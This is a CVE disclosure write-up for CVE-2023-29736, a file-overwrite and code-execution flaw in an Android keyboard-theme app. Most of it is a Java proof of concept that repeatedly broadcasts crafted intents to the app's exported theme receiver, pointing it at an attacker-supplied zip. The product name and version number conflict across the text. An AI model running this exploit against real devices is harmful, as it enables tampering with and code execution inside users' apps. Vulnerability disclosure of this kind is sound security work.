CVE-2023-29736: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs
Keyboard Themes 1.275.1.164 for Android contains a dictionary traversal vulnerability that allows unauthorized apps to overwrite arbitrary files in its internal storage and achieve arbitrary code execution.
Code execution exists in Keyboard Themes For Android (CVE-2023-29736)
Vendor: T-ME Studios (https://corporate.timmystudios.com/)
Affected product: Keyboard Themes For Android (com.jb.gokeyboard.theme.tmekeyboardthemeforandroid)
Version: 1.2
Download link: https://play.google.com/store/apps/details?id=com.jb.gokeyboard.theme.tmekeyboardthemeforandroid
Description of the vulnerability for use in the CVE: Fast Typing Keyboard v1.275.1.162 allows unauthorized apps to overwrite arbitrary files in its internal storage via a dictionary traversal vulnerability and achieve arbitrary code execution.
PoC:

```java
import android.content.ComponentName;
import android.content.Intent;

// Method of an Activity (or any other Context) in the sending app.
private void attack() {
    while (true) {
        // Explicit broadcast addressed to the app's SuperThemeReceiver.
        Intent intent = new Intent();
        ComponentName componentName = new ComponentName(
                "com.jb.gokeyboard.theme.tmekeyboardthemeforandroid",
                "com.timmystudios.redrawkeyboard.themes.SuperThemeReceiver");
        intent.setComponent(componentName);
        intent.setAction("com.timmystudios.redrawkeyboard.intent.action.THEME_APPLIED");
        intent.putExtra("package-name", "com.ludashi.xsuperclean");

        // Font extras.
        intent.putExtra("selected-font", true);
        intent.putExtra("font_name", "hack");
        intent.putExtra("font_id", "2");
        intent.putExtra("font_resource", "hackkkk");
        intent.putExtra("font_size", 123456);

        // Sound extras.
        intent.putExtra("selected-sound", true);
        intent.putExtra("sound_name", "hack");
        intent.putExtra("sound_id", "2");
        intent.putExtra("sound_resource", "hackkkk");
        intent.putExtra("sound_size", 123456);

        // Theme id and the path of the archive supplied by the sending app.
        intent.putExtra("go_theme_id", 3);
        intent.putExtra("go_res_zip_path", "/data/local/tmp/test.zip");

        try {
            sendBroadcast(intent);
        } catch (Exception e) {
            // Ignored, as in the original PoC.
        }
    }
}
```